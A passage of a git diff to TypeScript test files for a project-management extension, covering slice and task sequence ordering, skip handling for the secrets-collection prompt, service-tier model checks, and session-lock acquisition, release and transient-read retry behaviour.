+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+
+    // Insert in reverse lexicographic order with sequence overriding id order
+    insertSlice({ id: 'S03', milestoneId: 'M001', title: 'Third by id, first by seq', sequence: 1 });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First by id, third by seq', sequence: 3 });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second by id, second by seq', sequence: 2 });
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices.length, 3);
+    assert.equal(slices[0]!.id, 'S03', 'sequence=1 should be first');
+    assert.equal(slices[1]!.id, 'S02', 'sequence=2 should be second');
+    assert.equal(slices[2]!.id, 'S01', 'sequence=3 should be third');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: getSliceTasks returns tasks ordered by sequence then id', () => {
+  const base = makeTmp();
+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice' });
+
+    // Insert tasks with sequence overriding id order
+    insertTask({ id: 'T03', sliceId: 'S01', milestoneId: 'M001', title: 'Third by id', sequence: 1 });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'First by id', sequence: 3 });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Second by id', sequence: 2 });
+
+    const tasks = getSliceTasks('M001', 'S01');
+    assert.equal(tasks.length, 3);
+    assert.equal(tasks[0]!.id, 'T03', 'sequence=1 should be first');
+    assert.equal(tasks[1]!.id, 'T02', 'sequence=2 should be second');
+    assert.equal(tasks[2]!.id, 'T01', 'sequence=3 should be third');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: default sequence (0) falls back to id-based ordering', () => {
+  const base = makeTmp();
+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+
+    // All slices with default sequence=0 should sort by id
+    insertSlice({ id: 'S03', milestoneId: 'M001', title: 'Third' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'First' });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Second' });
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices[0]!.id, 'S01', 'default seq=0: should sort by id');
+    assert.equal(slices[1]!.id, 'S02');
+    assert.equal(slices[2]!.id, 'S03');
+
+    // Same for tasks
+    insertSlice({ id: 'S04', milestoneId: 'M001', title: 'Container' });
+    insertTask({ id: 'T02', sliceId: 'S04', milestoneId: 'M001', title: 'B' });
+    insertTask({ id: 'T01', sliceId: 'S04', milestoneId: 'M001', title: 'A' });
+    insertTask({ id: 'T03', sliceId: 'S04', milestoneId: 'M001', title: 'C' });
+
+    const tasks = getSliceTasks('M001', 'S04');
+    assert.equal(tasks[0]!.id, 'T01');
+    assert.equal(tasks[1]!.id, 'T02');
+    assert.equal(tasks[2]!.id, 'T03');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: getActiveSliceFromDb respects sequence ordering', () => {
+  const base = makeTmp();
+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+
+    // S02 has lower sequence so should be active first despite higher id than S01
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Higher seq', status: 'pending', sequence: 5 });
+    insertSlice({ id: 'S02', milestoneId: 'M001', title: 'Lower seq', status: 'pending', sequence: 2 });
+
+    const active = getActiveSliceFromDb('M001');
+    assert.ok(active);
+    assert.equal(active!.id, 'S02', 'lower sequence should be active first');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: getActiveTaskFromDb respects sequence ordering', () => {
+  const base = makeTmp();
+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Slice' });
+
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Higher seq', status: 'pending', sequence: 10 });
+    insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Lower seq', status: 'pending', sequence: 1 });
+
+    const active = getActiveTaskFromDb('M001', 'S01');
+    assert.ok(active);
+    assert.equal(active!.id, 'T02', 'lower sequence should be active first');
+  } finally {
+    cleanup(base);
+  }
+});
+
+test('schema v9: sequence field defaults to 0 when not provided', () => {
+  const base = makeTmp();
+  openDatabase(join(base, 'gsd.db'));
+  try {
+    insertMilestone({ id: 'M001', title: 'Test', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'No seq' });
+    insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'No seq' });
+
+    const slices = getMilestoneSlices('M001');
+    assert.equal(slices[0]!.sequence, 0, 'slice sequence defaults to 0');
+
+    const tasks = getSliceTasks('M001', 'S01');
+    assert.equal(tasks[0]!.sequence, 0, 'task sequence defaults to 0');
+  } finally {
+    cleanup(base);
+  }
+});
diff --git a/src/resources/extensions/gsd/tests/secure-env-collect.test.ts b/src/resources/extensions/gsd/tests/secure-env-collect.test.ts
index bd6096674..18acf7dd4 100644
--- a/src/resources/extensions/gsd/tests/secure-env-collect.test.ts
+++ b/src/resources/extensions/gsd/tests/secure-env-collect.test.ts
@@ -183,3 +183,137 @@ test("secure_env_collect: detectDestination — convex file (not dir) does not t
 		rmSync(tmp, { recursive: true, force: true });
 	}
 });
+
+// ─── Bug #2997: undefined vs null handling ──────────────────────────────────
+
+/**
+ * When ctx.ui.custom() returns undefined (e.g. noOpUIContext, component
+ * disposal, abort), the strict null checks (=== null / !== null) let
+ * undefined slip through as a "provided" value, crashing writeEnvKey
+ * which calls .replace() on it.
+ *
+ * These tests verify the fix: loose equality (== null / != null) so that
+ * both null AND undefined are treated as "skipped".
+ */
+
+// Helper to dynamically load the orchestrator
+async function loadOrchestrator(): Promise<{
+	collectSecretsFromManifest: Function;
+}> {
+	const mod = await import("../../get-secrets-from-user.ts");
+	return { collectSecretsFromManifest: mod.collectSecretsFromManifest };
+}
+
+// Helper to dynamically load files.ts functions
+async function loadFilesExports(): Promise<{
+	formatSecretsManifest: (m: any) => string;
+}> {
+	const mod = await import("../files.ts");
+	return { formatSecretsManifest: mod.formatSecretsManifest };
+}
+
+function makeManifest(entries: Array<{ key: string; status?: string; formatHint?: string; guidance?: string[] }>): any {
+	return {
+		milestone: "M001",
+		generatedAt: "2026-03-12T00:00:00Z",
+		entries: entries.map((e) => ({
+			key: e.key,
+			service: "TestService",
+			dashboardUrl: "",
+			guidance: e.guidance ?? [],
+			formatHint: e.formatHint ?? "",
+			status: e.status ?? "pending",
+			destination: "dotenv",
+		})),
+	};
+}
+
+async function writeManifestFile(dir: string, manifest: any): Promise<string> {
+	const { formatSecretsManifest } = await loadFilesExports();
+	const milestoneDir = join(dir, ".gsd", "milestones", "M001");
+	mkdirSync(milestoneDir, { recursive: true });
+	const filePath = join(milestoneDir, "M001-SECRETS.md");
+	writeFileSync(filePath, formatSecretsManifest(manifest));
+	return filePath;
+}
+
+test("secure_env_collect #2997: undefined from ctx.ui.custom() is treated as skipped, not provided", async (t) => {
+	const { collectSecretsFromManifest } = await loadOrchestrator();
+
+	const tmp = makeTempDir("sec-undefined-test");
+	t.after(() => {
+		rmSync(tmp, { recursive: true, force: true });
+	});
+
+	const manifest = makeManifest([
+		{ key: "SECRET_THAT_RETURNS_UNDEFINED", status: "pending" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			// First call is summary screen, second is collect — return undefined
+			// to simulate noOpUIContext or component disposal
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary screen dismiss
+				return undefined; // BUG TRIGGER: should be treated as skipped
+			},
+		},
+	};
+
+	// Before the fix, this crashes with:
+	// "Cannot read properties of undefined (reading 'replace')"
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	// The undefined-returning key must appear in skipped, not in applied
+	assert.ok(
+		result.skipped.includes("SECRET_THAT_RETURNS_UNDEFINED"),
+		"Key returning undefined should be in skipped list",
+	);
+	assert.ok(
+		!result.applied.includes("SECRET_THAT_RETURNS_UNDEFINED"),
+		"Key returning undefined must NOT be in applied list",
+	);
+});
+
+test("secure_env_collect #2997: null from ctx.ui.custom() is still treated as skipped (regression guard)", async (t) => {
+	const { collectSecretsFromManifest } = await loadOrchestrator();
+
+	const tmp = makeTempDir("sec-null-test");
+	t.after(() => {
+		rmSync(tmp, { recursive: true, force: true });
+	});
+
+	const manifest = makeManifest([
+		{ key: "SECRET_THAT_RETURNS_NULL", status: "pending" },
+	]);
+	await writeManifestFile(tmp, manifest);
+
+	let callIndex = 0;
+	const mockCtx = {
+		cwd: tmp,
+		hasUI: true,
+		ui: {
+			custom: async (_factory: any) => {
+				callIndex++;
+				if (callIndex <= 1) return null; // summary screen dismiss
+				return null; // explicit null skip
+			},
+		},
+	};
+
+	const result = await collectSecretsFromManifest(tmp, "M001", mockCtx as any);
+
+	assert.ok(
+		result.skipped.includes("SECRET_THAT_RETURNS_NULL"),
+		"Key returning null should be in skipped list",
+	);
+	assert.ok(
+		!result.applied.includes("SECRET_THAT_RETURNS_NULL"),
+		"Key returning null must NOT be in applied list",
+	);
+});
diff --git a/src/resources/extensions/gsd/tests/service-tier.test.ts b/src/resources/extensions/gsd/tests/service-tier.test.ts
index ff6d0b684..2192c9aa7 100644
--- a/src/resources/extensions/gsd/tests/service-tier.test.ts
+++ b/src/resources/extensions/gsd/tests/service-tier.test.ts
@@ -4,8 +4,8 @@ import assert from "node:assert/strict";
 import {
   supportsServiceTier,
   formatServiceTierStatus,
+  formatServiceTierFooterStatus,
   resolveServiceTierIcon,
-  type ServiceTierSetting,
 } from "../service-tier.ts";
 
 // ─── supportsServiceTier ─────────────────────────────────────────────────────
@@ -27,6 +27,14 @@ describe("supportsServiceTier", () => {
     assert.equal(supportsServiceTier("openai/gpt-5.4"), true);
   });
 
+  test("returns true for vibeproxy-openai/gpt-5.4 (proxy provider-prefixed)", () => {
+    assert.equal(supportsServiceTier("vibeproxy-openai/gpt-5.4"), true);
+  });
+
+  test("returns false for provider-only identifier without gpt-5.4 model suffix", () => {
+    assert.equal(supportsServiceTier("vibeproxy-openai"), false);
+  });
+
   test("returns false for claude-opus-4-6", () => {
     assert.equal(supportsServiceTier("claude-opus-4-6"), false);
   });
@@ -52,6 +60,11 @@ describe("formatServiceTierStatus", () => {
     assert.ok(output.includes("disabled"), `Expected 'disabled' in: ${output}`);
   });
 
+  test("mentions provider-agnostic model gating", () => {
+    const output = formatServiceTierStatus("priority");
+    assert.ok(output.includes("regardless of provider"), `Expected provider note in: ${output}`);
+  });
+
   test("shows priority when set to priority", () => {
     const output = formatServiceTierStatus("priority");
     assert.ok(output.includes("priority"), `Expected 'priority' in: ${output}`);
@@ -63,6 +76,22 @@ describe("formatServiceTierStatus", () => {
   });
 });
 
+// ─── formatServiceTierFooterStatus ───────────────────────────────────────────
+
+describe("formatServiceTierFooterStatus", () => {
+  test("returns priority footer status for supported model", () => {
+    assert.equal(formatServiceTierFooterStatus("priority", "vibeproxy-openai/gpt-5.4"), "fast: ⚡ priority");
+  });
+
+  test("returns undefined for unsupported model", () => {
+    assert.equal(formatServiceTierFooterStatus("priority", "claude-opus-4-6"), undefined);
+  });
+
+  test("returns undefined when tier is disabled", () => {
+    assert.equal(formatServiceTierFooterStatus(undefined, "gpt-5.4"), undefined);
+  });
+});
+
 // ─── resolveServiceTierIcon ──────────────────────────────────────────────────
 
 describe("resolveServiceTierIcon", () => {
diff --git a/src/resources/extensions/gsd/tests/session-lock-multipath.test.ts b/src/resources/extensions/gsd/tests/session-lock-multipath.test.ts
index e50cc8e8a..66ed062b6 100644
--- a/src/resources/extensions/gsd/tests/session-lock-multipath.test.ts
+++ b/src/resources/extensions/gsd/tests/session-lock-multipath.test.ts
@@ -20,11 +20,11 @@ import {
   _getRegisteredLockDirs,
 } from '../session-lock.ts';
 import { gsdRoot } from '../paths.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 
-async function main(): Promise<void> {
+describe('session-lock-multipath', async () => {
 
   // ─── 1. Lock dir registry tracks gsdDir on acquisition ──────────────────
   console.log('\n=== 1. Lock dir registry tracks gsdDir on acquisition ===');
@@ -34,17 +34,17 @@ async function main(): Promise<void> {
 
     try {
       const result = acquireSessionLock(base);
-      assertTrue(result.acquired, 'lock acquired');
+      assert.ok(result.acquired, 'lock acquired');
 
       const registered = _getRegisteredLockDirs();
       const gsdDir = gsdRoot(base);
-      assertTrue(registered.includes(gsdDir), 'gsdDir is registered in lock dir registry');
+      assert.ok(registered.includes(gsdDir), 'gsdDir is registered in lock dir registry');
 
       releaseSessionLock(base);
 
       // After release, registry should be cleared
       const afterRelease = _getRegisteredLockDirs();
-      assertEq(afterRelease.length, 0, 'lock dir registry cleared after release');
+      assert.deepStrictEqual(afterRelease.length, 0, 'lock dir registry cleared after release');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -62,7 +62,7 @@ async function main(): Promise<void> {
 
     try {
       const result = acquireSessionLock(base);
-      assertTrue(result.acquired, 'lock acquired');
+      assert.ok(result.acquired, 'lock acquired');
 
       // Manually plant a stale lock file at the secondary path to simulate
       // multi-path lock accumulation
@@ -72,8 +72,8 @@ async function main(): Promise<void> {
       mkdirSync(secondaryLockDir, { recursive: true });
 
       // Verify they exist before release
-      assertTrue(existsSync(secondaryLockFile), 'secondary lock file exists before release');
-      assertTrue(existsSync(secondaryLockDir), 'secondary lock dir exists before release');
+      assert.ok(existsSync(secondaryLockFile), 'secondary lock file exists before release');
+      assert.ok(existsSync(secondaryLockDir), 'secondary lock dir exists before release');
 
       // Manually add the secondary dir to the registry (simulating ensureExitHandler call)
       // We do this by acquiring knowledge of internals — the registry is populated
@@ -83,10 +83,10 @@ async function main(): Promise<void> {
 
       // Primary lock artifacts should be cleaned
       const primaryLockFile = join(gsdRoot(base), 'auto.lock');
-      assertTrue(!existsSync(primaryLockFile), 'primary auto.lock removed after release');
+      assert.ok(!existsSync(primaryLockFile), 'primary auto.lock removed after release');
 
       const primaryLockDir = gsdRoot(base) + '.lock';
-      assertTrue(!existsSync(primaryLockDir), 'primary .gsd.lock/ removed after release');
+      assert.ok(!existsSync(primaryLockDir), 'primary .gsd.lock/ removed after release');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -106,7 +106,7 @@ async function main(): Promise<void> {
       const gsdDir = gsdRoot(base);
       // Should only appear once (Set deduplication)
       const count = registered.filter(d => d === gsdDir).length;
-      assertEq(count, 1, 'gsdDir registered exactly once after re-entrant acquisition');
+      assert.deepStrictEqual(count, 1, 'gsdDir registered exactly once after re-entrant acquisition');
 
       releaseSessionLock(base);
     } finally {
@@ -124,17 +124,17 @@ async function main(): Promise<void> {
 
     try {
       const r1 = acquireSessionLock(base1);
-      assertTrue(r1.acquired, 'first base lock acquired');
+      assert.ok(r1.acquired, 'first base lock acquired');
 
       // Release first to acquire second (module state is single-lock)
       releaseSessionLock(base1);
 
       const r2 = acquireSessionLock(base2);
-      assertTrue(r2.acquired, 'second base lock acquired');
+      assert.ok(r2.acquired, 'second base lock acquired');
 
       const registered = _getRegisteredLockDirs();
       const gsd2 = gsdRoot(base2);
-      assertTrue(registered.includes(gsd2), 'second gsdDir is registered');
+      assert.ok(registered.includes(gsd2), 'second gsdDir is registered');
 
       releaseSessionLock(base2);
     } finally {
@@ -156,18 +156,11 @@ async function main(): Promise<void> {
       // Verify everything is clean
       const lockFile = join(gsdRoot(base), 'auto.lock');
       const lockDir = gsdRoot(base) + '.lock';
-      assertTrue(!existsSync(lockFile), 'auto.lock cleaned');
-      assertTrue(!existsSync(lockDir), '.gsd.lock/ cleaned');
-      assertEq(_getRegisteredLockDirs().length, 0, 'registry empty');
+      assert.ok(!existsSync(lockFile), 'auto.lock cleaned');
+      assert.ok(!existsSync(lockDir), '.gsd.lock/ cleaned');
+      assert.deepStrictEqual(_getRegisteredLockDirs().length, 0, 'registry empty');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
   }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/session-lock-regression.test.ts b/src/resources/extensions/gsd/tests/session-lock-regression.test.ts
index 22bc3d397..86631e525 100644
--- a/src/resources/extensions/gsd/tests/session-lock-regression.test.ts
+++ b/src/resources/extensions/gsd/tests/session-lock-regression.test.ts
@@ -25,9 +25,9 @@ import {
   isSessionLockHeld,
 } from '../session-lock.ts';
 import { gsdRoot } from '../paths.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 const require = createRequire(import.meta.url);
 
 function hasProperLockfile(): boolean {
@@ -41,7 +41,7 @@ function hasProperLockfile(): boolean {
 
 const properLockfileAvailable = hasProperLockfile();
 
-async function main(): Promise<void> {
+describe('session-lock-regression', async () => {
 
   // ─── 1. Basic acquire/release lifecycle ───────────────────────────────
   console.log('\n=== 1. acquire → validate → release lifecycle ===');
@@ -51,22 +51,22 @@ async function main(): Promise<void> {
 
     try {
       const result = acquireSessionLock(base);
-      assertTrue(result.acquired, 'lock acquired successfully');
+      assert.ok(result.acquired, 'lock acquired successfully');
 
       const valid = validateSessionLock(base);
-      assertTrue(valid, 'lock validates after acquisition');
+      assert.ok(valid, 'lock validates after acquisition');
 
-      assertTrue(isSessionLockHeld(base), 'isSessionLockHeld returns true');
+      assert.ok(isSessionLockHeld(base), 'isSessionLockHeld returns true');
 
       releaseSessionLock(base);
 
       // After release, the lock file should be cleaned up
       const lockFile = join(gsdRoot(base), 'auto.lock');
-      assertTrue(!existsSync(lockFile), 'lock file removed after release');
+      assert.ok(!existsSync(lockFile), 'lock file removed after release');
 
       // The .gsd.lock/ directory should be cleaned up
       const lockDir = gsdRoot(base) + '.lock';
-      assertTrue(!existsSync(lockDir), '.gsd.lock/ directory removed after release (#1245)');
+      assert.ok(!existsSync(lockDir), '.gsd.lock/ directory removed after release (#1245)');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -88,7 +88,7 @@ async function main(): Promise<void> {
       } catch {
         threw = true;
       }
-      assertTrue(!threw, 'double release does not throw');
+      assert.ok(!threw, 'double release does not throw');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -103,16 +103,15 @@ async function main(): Promise<void> {
     try {
       acquireSessionLock(base);
 
-      updateSessionLock(base, 'execute-task', 'M001/S01/T01', 5, '/tmp/session.json');
+      updateSessionLock(base, 'execute-task', 'M001/S01/T01', '/tmp/session.json');
 
       const data = readSessionLockData(base);
-      assertTrue(data !== null, 'lock data readable after update');
+      assert.ok(data !== null, 'lock data readable after update');
       if (data) {
-        assertEq(data.pid, process.pid, 'lock data has correct PID');
-        assertEq(data.unitType, 'execute-task', 'lock data has correct unit type');
-        assertEq(data.unitId, 'M001/S01/T01', 'lock data has correct unit ID');
-        assertEq(data.completedUnits, 5, 'lock data has correct completed count');
-        assertEq(data.sessionFile, '/tmp/session.json', 'lock data has session file');
+        assert.deepStrictEqual(data.pid, process.pid, 'lock data has correct PID');
+        assert.deepStrictEqual(data.unitType, 'execute-task', 'lock data has correct unit type');
+        assert.deepStrictEqual(data.unitId, 'M001/S01/T01', 'lock data has correct unit ID');
+        assert.deepStrictEqual(data.sessionFile, '/tmp/session.json', 'lock data has session file');
       }
 
       releaseSessionLock(base);
@@ -136,13 +135,12 @@ async function main(): Promise<void> {
         unitType: 'execute-task',
         unitId: 'M001/S01/T01',
         unitStartedAt: new Date(Date.now() - 3600000).toISOString(),
-        completedUnits: 3,
       };
       writeFileSync(lockFile, JSON.stringify(staleLock, null, 2));
 
       // Should be able to acquire despite the stale lock
       const result = acquireSessionLock(base);
-      assertTrue(result.acquired, '#1245: stale lock from dead PID → re-acquirable');
+      assert.ok(result.acquired, '#1245: stale lock from dead PID → re-acquirable');
 
       releaseSessionLock(base);
     } finally {
@@ -158,7 +156,7 @@ async function main(): Promise<void> {
 
     try {
       const data = readSessionLockData(base);
-      assertEq(data, null, 'no lock file → null');
+      assert.deepStrictEqual(data, null, 'no lock file → null');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -176,7 +174,7 @@ async function main(): Promise<void> {
       // Multiple validations should all return true (regression for #1257)
       for (let i = 0; i < 5; i++) {
         const valid = validateSessionLock(base);
-        assertTrue(valid, `#1257: validation ${i + 1} returns true for own lock`);
+        assert.ok(valid, `#1257: validation ${i + 1} returns true for own lock`);
       }
 
       releaseSessionLock(base);
@@ -196,7 +194,7 @@ async function main(): Promise<void> {
       writeFileSync(lockFile, 'NOT VALID JSON {{{');
 
       const data = readSessionLockData(base);
-      assertEq(data, null, 'corrupt JSON → null');
+      assert.deepStrictEqual(data, null, 'corrupt JSON → null');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -210,9 +208,9 @@ async function main(): Promise<void> {
 
     try {
       const status = getSessionLockStatus(base);
-      assertEq(status.valid, false, 'missing lock metadata is invalid');
-      assertEq(status.failureReason, 'missing-metadata', 'missing metadata reason is surfaced');
-      assertEq(status.expectedPid, process.pid, 'expected PID is included');
+      assert.deepStrictEqual(status.valid, false, 'missing lock metadata is invalid');
+      assert.deepStrictEqual(status.failureReason, 'missing-metadata', 'missing metadata reason is surfaced');
+      assert.deepStrictEqual(status.expectedPid, process.pid, 'expected PID is included');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -233,14 +231,13 @@ async function main(): Promise<void> {
         unitType: 'execute-task',
         unitId: 'M001/S01/T01',
         unitStartedAt: new Date().toISOString(),
-        completedUnits: 0,
       }, null, 2));
 
       const status = getSessionLockStatus(base);
-      assertEq(status.valid, false, 'foreign PID lock is invalid');
-      assertEq(status.failureReason, 'pid-mismatch', 'PID mismatch reason is surfaced');
-      assertEq(status.existingPid, foreignPid, 'existing PID is included');
-      assertEq(status.expectedPid, process.pid, 'expected PID is included');
+      assert.deepStrictEqual(status.valid, false, 'foreign PID lock is invalid');
+      assert.deepStrictEqual(status.failureReason, 'pid-mismatch', 'PID mismatch reason is surfaced');
+      assert.deepStrictEqual(status.existingPid, foreignPid, 'existing PID is included');
+      assert.deepStrictEqual(status.expectedPid, process.pid, 'expected PID is included');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
@@ -254,11 +251,11 @@ async function main(): Promise<void> {
 
     try {
       const r1 = acquireSessionLock(base);
-      assertTrue(r1.acquired, 'first acquisition');
+      assert.ok(r1.acquired, 'first acquisition');
       releaseSessionLock(base);
 
       const r2 = acquireSessionLock(base);
-      assertTrue(r2.acquired, 're-acquisition after release');
+      assert.ok(r2.acquired, 're-acquisition after release');
       releaseSessionLock(base);
     } finally {
       rmSync(base, { recursive: true, force: true });
@@ -273,13 +270,13 @@ async function main(): Promise<void> {
 
     try {
       const r1 = acquireSessionLock(base);
-      assertTrue(r1.acquired, 'first acquisition succeeds');
+      assert.ok(r1.acquired, 'first acquisition succeeds');
 
       const r2 = acquireSessionLock(base);
-      assertTrue(r2.acquired, 're-entrant acquisition succeeds');
+      assert.ok(r2.acquired, 're-entrant acquisition succeeds');
 
       const valid = validateSessionLock(base);
-      assertTrue(valid, 're-entrant acquisition does not corrupt validation state');
+      assert.ok(valid, 're-entrant acquisition does not corrupt validation state');
 
       releaseSessionLock(base);
     } finally {
@@ -295,31 +292,24 @@ async function main(): Promise<void> {
 
     try {
       const r1 = acquireSessionLock(base);
-      assertTrue(r1.acquired, 'first acquisition succeeds');
+      assert.ok(r1.acquired, 'first acquisition succeeds');
 
       const lockDir = gsdRoot(base) + '.lock';
       if (properLockfileAvailable) {
-        assertTrue(existsSync(lockDir), '.gsd.lock/ exists after first acquisition');
+        assert.ok(existsSync(lockDir), '.gsd.lock/ exists after first acquisition');
       }
 
       const r2 = acquireSessionLock(base);
-      assertTrue(r2.acquired, 'second acquisition succeeds');
+      assert.ok(r2.acquired, 'second acquisition succeeds');
       if (properLockfileAvailable) {
-        assertTrue(existsSync(lockDir), '.gsd.lock/ exists after re-entrant acquisition');
+        assert.ok(existsSync(lockDir), '.gsd.lock/ exists after re-entrant acquisition');
       }
-      assertTrue(validateSessionLock(base), 'lock remains valid after re-entrant acquisition');
+      assert.ok(validateSessionLock(base), 'lock remains valid after re-entrant acquisition');
 
       releaseSessionLock(base);
-      assertTrue(!existsSync(lockDir), '.gsd.lock/ is removed after release');
+      assert.ok(!existsSync(lockDir), '.gsd.lock/ is removed after release');
     } finally {
       rmSync(base, { recursive: true, force: true });
     }
   }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
 });
diff --git a/src/resources/extensions/gsd/tests/session-lock-transient-read.test.ts b/src/resources/extensions/gsd/tests/session-lock-transient-read.test.ts
new file mode 100644
index 000000000..60192527c
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/session-lock-transient-read.test.ts
@@ -0,0 +1,224 @@
+/**
+ * session-lock-transient-read.test.ts — Tests for transient lock file unreadability (#2324).
+ *
+ * Regression coverage for:
+ *   #2324  onCompromised declares lock lost when the lock file is temporarily
+ *          unreadable (NFS/CIFS latency, macOS APFS snapshot, concurrent process
+ *          briefly holding the file).
+ *
+ * Tests:
+ *   - readExistingLockDataWithRetry retries on transient read failure
+ *   - readExistingLockDataWithRetry returns data when file becomes readable after retries
+ *   - readExistingLockDataWithRetry returns null only when ALL retries exhausted
+ *   - onCompromised does not declare compromise when lock file is transiently unreadable
+ */
+
+import { mkdtempSync, mkdirSync, writeFileSync, rmSync, existsSync, renameSync, unlinkSync, chmodSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { execSync, spawn } from 'node:child_process';
+
+import {
+  acquireSessionLock,
+  getSessionLockStatus,
+  releaseSessionLock,
+  readExistingLockDataWithRetry,
+  type SessionLockData,
+} from '../session-lock.ts';
+import { gsdRoot } from '../paths.ts';
+import { createTestContext } from './test-helpers.ts';
+
+const { assertEq, assertTrue, report } = createTestContext();
+
+async function main(): Promise<void> {
+
+  // ─── 1. readExistingLockDataWithRetry succeeds on first read when file is fine ─
+  console.log('\n=== 1. readExistingLockDataWithRetry reads file normally ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const lockFile = join(gsdRoot(base), 'auto.lock');
+      const lockData: SessionLockData = {
+        pid: process.pid,
+        startedAt: new Date().toISOString(),
+        unitType: 'execute-task',
+        unitId: 'M001/S01/T01',
+        unitStartedAt: new Date().toISOString(),
+        sessionFile: 'test-session.json',
+      };
+      writeFileSync(lockFile, JSON.stringify(lockData, null, 2));
+
+      const result = readExistingLockDataWithRetry(lockFile);
+      assertTrue(result !== null, 'data returned for readable file');
+      assertEq(result!.pid, process.pid, 'correct PID read');
+      assertEq(result!.sessionFile, 'test-session.json', 'correct sessionFile read');
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  // ─── 2. readExistingLockDataWithRetry returns null for truly missing file ──
+  console.log('\n=== 2. readExistingLockDataWithRetry returns null for missing file ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const lockFile = join(gsdRoot(base), 'auto.lock');
+      // File doesn't exist
+      const result = readExistingLockDataWithRetry(lockFile, { maxAttempts: 2, delayMs: 10 });
+      assertEq(result, null, 'null for truly missing file after retries');
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  // ─── 3. readExistingLockDataWithRetry recovers after transient rename ──────
+  console.log('\n=== 3. readExistingLockDataWithRetry recovers after transient unavailability ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const lockFile = join(gsdRoot(base), 'auto.lock');
+      const tmpFile = lockFile + '.hidden';
+      const lockData: SessionLockData = {
+        pid: process.pid,
+        startedAt: new Date().toISOString(),
+        unitType: 'execute-task',
+        unitId: 'M001/S01/T01',
+        unitStartedAt: new Date().toISOString(),
+        sessionFile: 'recovery-session.json',
+      };
+      writeFileSync(lockFile, JSON.stringify(lockData, null, 2));
+
+      // Simulate transient unavailability: move file away, spawn a child process
+      // to restore it shortly after. The child runs outside our event loop so it
+      // fires even during busy-wait retries. Give the test extra retry budget so
+      // it stays stable under full-suite CPU contention.
+      renameSync(lockFile, tmpFile);
+      spawn('bash', ['-c', `sleep 0.05 && mv "${tmpFile}" "${lockFile}"`], { stdio: 'ignore', detached: true }).unref();
+
+      const result = readExistingLockDataWithRetry(lockFile, { maxAttempts: 8, delayMs: 400 });
+      assertTrue(result !== null, 'data recovered after transient unavailability');
+      if (result) {
+        assertEq(result.pid, process.pid, 'correct PID after recovery');
+        assertEq(result.sessionFile, 'recovery-session.json', 'correct sessionFile after recovery');
+      }
+    } finally {
+      rmSync(base, { recursive: true, force: true });
+    }
+  }
+
+  // ─── 4. readExistingLockDataWithRetry recovers from transient permission error ─
+  console.log('\n=== 4. readExistingLockDataWithRetry recovers from transient permission error ===');
+  {
+    const base = mkdtempSync(join(tmpdir(), 'gsd-transient-'));
+    mkdirSync(join(base, '.gsd'), { recursive: true });
+
+    try {
+      const lockFile = join(gsdRoot(base), 'auto.lock');
